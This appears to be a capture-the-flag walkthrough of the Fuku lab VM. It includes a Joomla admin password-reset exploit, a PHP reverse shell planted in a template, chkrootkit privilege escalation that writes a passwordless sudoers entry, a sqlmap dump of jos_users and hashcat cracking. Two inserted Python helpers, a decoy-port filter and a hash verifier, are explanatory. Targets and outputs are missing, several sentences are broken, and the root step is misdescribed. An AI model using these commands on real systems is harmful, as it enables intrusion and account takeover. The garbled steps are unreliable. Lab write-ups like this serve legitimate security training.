SecTalks: BNE0x02 - Fuku


  • netdiscover
  • Nmap
  • Netcat
  • Wfuzz
  • Nikto
  • Joomscan


Use Joomla! Remote Admin Change Password Exploit

Use netdiscover to detect the target IP address.

netdiscover -i eth0 -r is the target.

Then run nmap to detect open ports and the services running on the target machine.

nmap -sV -v -O -A -T5 -p-

As we can see, almost every port is open. I guess the target machine doesn't want the attacker to know which services are actually running.

I use nc to read some ports such as 80, 22 and 23. Port 22 returns:

SSH-2.0-OpenSSH 6.7p1 Ububtu-5ubuntu1

while the rest of the ports return:

Looks like I need to filter out ports like these. I wrote a script to make life easier:

After running the script, I find only port 22 and port 13370 are open.
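The filtering idea behind that script, as an added example that is not the script from the original post: a decoy box answers every port with the same junk, so the real services are the ports whose response differs from the dominant one. The code works on responses you have already collected (for example with nc) and makes no network connections itself; the banners below are constructed, not captured from the target, and the function names are my own.

```python
#!/usr/bin/env python3
"""Separate real services from decoy ports in a set of banner-grab results.

Added example, not the author's script. Input is a dict of port -> bytes
received (None for refused/timed-out connections). The sample data below is
constructed for illustration.
"""
from collections import Counter
from typing import Dict, List, Optional

# Constructed sample: the decoy answers identically on most ports, a real SSH
# service answers with its own banner, one port accepts but stays silent, and
# one port refuses the connection entirely.
DECOY_BANNER = b"HTTP/1.0 200 OK\r\n\r\n<html><body>nothing here</body></html>\r\n"
SAMPLE_RESPONSES: Dict[int, Optional[bytes]] = {
    21: DECOY_BANNER,
    22: b"SSH-2.0-OpenSSH_6.7p1 Ubuntu-5ubuntu1\r\n",
    23: DECOY_BANNER,
    25: None,                       # connection refused
    80: DECOY_BANNER,
    443: DECOY_BANNER,
    13370: b"",                     # accepted the connection, sent no banner
    31337: DECOY_BANNER,
}


def find_decoy_banner(responses: Dict[int, Optional[bytes]],
                      min_share: float = 0.5) -> Optional[bytes]:
    """Return the response seen on at least two ports and on at least
    min_share of all responding ports; None when no single response
    dominates (i.e. no decoy behaviour is detected)."""
    bodies = [r for r in responses.values() if r is not None]
    if not bodies:
        return None
    banner, count = Counter(bodies).most_common(1)[0]
    if count < 2 or count / len(bodies) < min_share:
        return None
    return banner


def filter_real_ports(responses: Dict[int, Optional[bytes]],
                      min_share: float = 0.5) -> List[int]:
    """Ports whose response differs from the decoy banner, sorted ascending.
    Refused/timed-out ports are dropped; a silent-but-open port is kept,
    since it is not the decoy. With no decoy detected, every responding
    port is returned."""
    decoy = find_decoy_banner(responses, min_share)
    return sorted(p for p, r in responses.items()
                  if r is not None and r != decoy)


if __name__ == "__main__":
    print("decoy banner:", find_decoy_banner(SAMPLE_RESPONSES))
    print("real ports:", filter_real_ports(SAMPLE_RESPONSES))
```

On the sample data the decoy is the repeated HTTP junk and the surviving ports are 22 and 13370, which matches the shape of the result above; the `min_share` threshold exists so that a box with a few genuinely identical services (two web servers, say) is not mistaken for a decoy.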

check the I got this

Review the page source:

Looks like Joomla!

Use wfuzz to scan:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

I get some interesting path names.

Use Nikto to scan:

nikto -h

check get the login page:

Now I can confirm it is Joomla!

Use joomscan to scan:

joomscan -u

Get the result:

Follow the steps:

  • input a new password for admin

Since it is the Japanese version, I followed my SickOs 1.2 post to upload a PHP reverse shell (/usr/share/webshells/php/php-reverse-shell.php).

I will edit the beez template file, copy the PHP reverse shell code into it and replace the IP address and port.

Set up netcat and get the shell.

However, I cannot execute most commands, even python:


python2.7 -c 'import pty; pty.spawn("/bin/bash")'


Now try to enumerate the OS:

ps aux |grep root

Looks like chkrootkit 0.49 is available.

I followed my previous SickOs 1.2 post to upload a PHP reverse shell (/usr/share/webshells/php/php-reverse-shell.php) to get root:

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update


chmod 777 /tmp/update


ls -al /etc/sudoers

Finally get root:

sudo su

Exploit Joomla HD FLV Player SQL Injection

in, I found the target uses HD FLV Player

Check the source code:

searchsploit HD FLV

Follow the instructions:

sqlmap -u "" -p id --dbms mysql --tables --level=5 --risk=3

Now get the columns of the table jos_users:

sqlmap -u "" -p id --dbms mysql -T jos_users --columns

Now I am interested in the columns username and password:

sqlmap -u "" -p id --dbms mysql -T jos_users -C username,password --dump

The first part should be the hash and the second part should be the salt. I used a Joomla password cracking tool. Here is also my python version:

Crack admin's password now:

Then log in as admin and upload the PHP reverse shell, the same as in the first part of this post.

Also, since the hash format is hash:salt, I looked at the hashcat example hashes: the matching MD5 format is md5($pass.$salt), so the value for the hashcat -m option should be 10 (see hashcat --help, under "Hash types").
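To make the hash:salt format concrete, here is an added example (not the cracking tool linked above, nor Joomla's own code) that builds, parses and verifies a legacy Joomla password hash exactly as the md5($pass.$salt) scheme works, and that checks a stored hash against a list of candidate passwords the way the python version mentioned above would. The password, salt and wordlist are constructed for the example; the function names are my own.

```python
#!/usr/bin/env python3
"""Legacy Joomla password hashes: md5(password + salt), stored as "hash:salt".

Added example, not code from the original post or from Joomla. All values
below are constructed; nothing here was dumped from a target.
"""
import hashlib
import secrets
import string
from typing import Iterable, Optional, Tuple


def parse_joomla_hash(stored: str) -> Tuple[str, str]:
    """Split a stored "hash:salt" value into (hex_digest, salt).

    Rejects values that are not a 32-character hex MD5 digest followed by a
    colon and a salt, so malformed dump rows fail loudly instead of silently
    never matching."""
    if ":" not in stored:
        raise ValueError("expected hash:salt")
    digest, salt = stored.split(":", 1)
    if len(digest) != 32 or any(c not in string.hexdigits for c in digest):
        raise ValueError("hash part is not a 32-character hex MD5 digest")
    if not salt:
        raise ValueError("empty salt")
    return digest.lower(), salt


def make_joomla_hash(password: str, salt: Optional[str] = None) -> str:
    """Produce a hash:salt string the way legacy Joomla (1.5/2.5) did.

    Joomla used a 32-character alphanumeric salt; md5 is kept here only
    because that is the scheme the stored hashes use."""
    if salt is None:
        alphabet = string.ascii_letters + string.digits
        salt = "".join(secrets.choice(alphabet) for _ in range(32))
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"


def verify_joomla_hash(password: str, stored: str) -> bool:
    """True when md5(password + salt) equals the stored digest.

    This is the same comparison hashcat mode 10 performs for each candidate,
    which is why the sqlmap dump can be fed to hashcat -m 10 unchanged."""
    digest, salt = parse_joomla_hash(stored)
    candidate = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return secrets.compare_digest(candidate, digest)


def audit_wordlist(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that reproduces the stored hash, or None.

    Useful for checking whether an admin password is in a common list; an
    unsalted-style speed is expected, since a single md5 per guess is cheap."""
    for candidate in candidates:
        if verify_joomla_hash(candidate, stored):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed example: a made-up password and a fixed salt.
    stored = make_joomla_hash("Spring2016!", "abc123")
    print("stored value:", stored)
    print("correct password verifies:", verify_joomla_hash("Spring2016!", stored))
    print("wrong case fails:", verify_joomla_hash("spring2016!", stored))
    print("found in list:", audit_wordlist(stored, ["password", "Spring2016!"]))
```

The stored value that sqlmap dumps is already in the hash:salt layout that hashcat mode 10 expects, so no reformatting is needed before the hashcat run below; the cheapness of one MD5 per guess is exactly why these legacy hashes fall to a wordlist so quickly.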

Use hashcat to crack it:

hashcat -m 10 -a 0 -o joompass.txt --remove 61.hash /usr/share/wordlists/rockyou.txt